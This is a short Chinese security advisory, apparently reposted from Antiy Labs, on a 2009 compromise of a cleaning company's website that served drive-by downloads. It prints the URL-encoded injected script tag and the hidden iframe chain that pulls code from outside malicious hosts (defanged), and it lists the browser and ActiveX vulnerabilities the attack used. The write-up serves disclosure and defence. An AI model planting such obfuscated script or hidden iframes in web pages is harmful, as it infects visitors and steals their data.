2009年3月18日,南昌金泉清洁管理有限公司(hxxp://www.jqqj.cn/)被黑客植入病毒,用户如果访问该网站,系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。
该网站问题代码:

<script language=javascript src=hxxp://%62%2E%39%34%73%61%6F%6D%6D%2E%63%6F%6D/js.js></script>

解密后获得连接:hxxp://b.94saomm.com/js.js
hxxp://b.94saomm.com/js.js恶意代码框架:
document.write("<iframe src=hxxp:\/\/tcpaidui.com\/b\/fs.htm width=100 height=0><\/iframe>");
hxxp://tcpaidui.com/b/fs.htm恶意代码框架:

document.writeln("<iframe src=all.htm width=100 height=0><\/iframe>");
|
hxxp://tcpaidui.com/b/all.htm恶意代码框架:

该网马利用以下漏洞来传播::
Adobe Flash Player SWF文件漏洞
MS06014漏洞 (clsid:BD96C556-65A3-11D0-983A-00C04FC29E36)
联众世界游戏大厅所安装的GLCHAT.GLChatCtrl.1 ActiveX控件漏洞
新浪DLoader Class ActiveX控件(clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A,Downloader.DLoader.1)任意文件下载漏洞
MS Office Snapshot Viewer ActiveX Exploit 漏洞
暴风影音播放器MPS.StormPlayer漏洞
超星阅读器漏洞
UUSee网络电视2008 UUUpgrade ActiveX Exploit
联众世界 Exploit
Real Networks RealPlayer包含的'rmoc3260.dll' ActiveX控件存在内存破坏漏洞
RealPlayer播放器IERPCtl.IERPCtl.1漏洞
微软IE7漏洞
以上病毒文件为下载者木马和游戏盗号木马,自动运行后将会,盗取用户敏感信息,甚至导致死机。由于下载数量太多,这里不一一分析。
注:被挂马的地址是:hxxp://www.jqqj.cn/
【资料来源:安天实验室】
(威盾新闻中心转载) |